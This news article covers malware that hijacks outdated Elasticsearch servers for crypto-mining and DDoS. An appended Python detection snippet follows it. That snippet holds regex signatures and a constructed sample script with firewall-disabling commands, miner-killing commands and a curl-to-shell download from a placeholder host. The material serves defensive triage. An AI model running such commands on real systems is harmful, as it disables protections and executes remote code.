Vicious malware threatens to turn search engine into crypto-mining zombie botnet


Enterprise search engine Elasticsearch is under threat of being turned into a sophisticated cryptocurrency-mining botnet that can also be used in distributed denial of service (DDoS) attacks.

Cybersecurity firm Trend Micro describes a new malware strain that launches multi-stage attacks on publicly accessible databases and servers that run old versions of Elasticsearch software.

“[…] Many of the malicious traffic or attacks that we see targeting Elasticsearch are relatively straightforward, and more often than not, profit-driven,” wrote Trend Micro.

“An attacker looks for unsecure or misconfigured servers or exploits old vulnerabilities, then drops the final payloads that typically consist of cryptocurrency-mining malware or even ransomware,” added the firm.

Not just a botnet, BillGates is here too

The malware works like this: First, it finds out-of-date servers and uses malicious search queries to force them to download and execute a series of dangerous scripts.

“The ways that the scripts are retrieved are notable,” said Trend Micro. “Using expendable domains, for instance, allows the attackers to swap URLs as soon as they are detected.”

The “first-stage” script attempts to shut down any firewall running on the target machine. It then kills any competing or already-running cryptocurrency mining process, before downloading another script that’s likely hosted by an already-compromised website.
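The three first-stage behaviours described above (firewall teardown, killing rival miners, fetching a second stage from a throwaway domain) give defenders something to triage retrieved scripts against. The following is an added example, not code from the article or from Trend Micro; the signatures and the sample script are constructed for illustration, and example.invalid stands in for an expendable domain.

```python
import re
# Heuristic signatures for the three first-stage behaviours the article describes;
# these are assumed patterns for illustration, not Trend Micro's indicators.
SIGNATURES = {
    "firewall_disable": [
        r"\biptables\s+(-F|--flush)\b",
        r"\bufw\s+disable\b",
        r"\b(systemctl|service)\s+(stop|disable)\s+(firewalld|iptables|ufw)\b",
    ],
    "miner_kill": [
        r"\b(pkill|killall)\b[^\n]*\b(xmrig|minerd|cryptonight|kworkerds)\b",
        r"\bps\s+(aux|-ef)\b[^\n]*\bgrep\b[^\n]*\bkill\b",
    ],
    "stage_download": [
        r"\b(curl|wget)\b[^\n]*https?://[^\s|;]+[^\n]*\|\s*(ba)?sh\b",
        r"\b(curl|wget)\b[^\n]*\.sh\b",
    ],
}

# Constructed sample resembling the described first stage; example.invalid
# is a placeholder for one of the "expendable domains" the article mentions.
SAMPLE = """\
#!/bin/sh
iptables -F
ufw disable
pkill -f xmrig
ps aux | grep -i minerd | awk '{print $2}' | xargs kill -9
curl -s http://example.invalid/stage2.sh | sh
"""

def triage_script(text):
    """Return {category: [matching lines]} for every signature that fires."""
    hits = {}
    for line in text.splitlines():
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        for category, patterns in SIGNATURES.items():
            if any(re.search(p, stripped) for p in patterns):
                hits.setdefault(category, []).append(stripped)
    return hits

def assess(text):
    """All three behaviours together match the article's first-stage profile;
    any single hit is only suspicious; no hits is clean."""
    hits = triage_script(text)
    if {"firewall_disable", "miner_kill", "stage_download"} <= set(hits):
        return "first-stage-profile", hits
    return ("suspicious" if hits else "clean"), hits
```

A single category firing (an admin script that flushes iptables, say) is only a weak signal; the combination of all three in one script is what matches the chain the article describes.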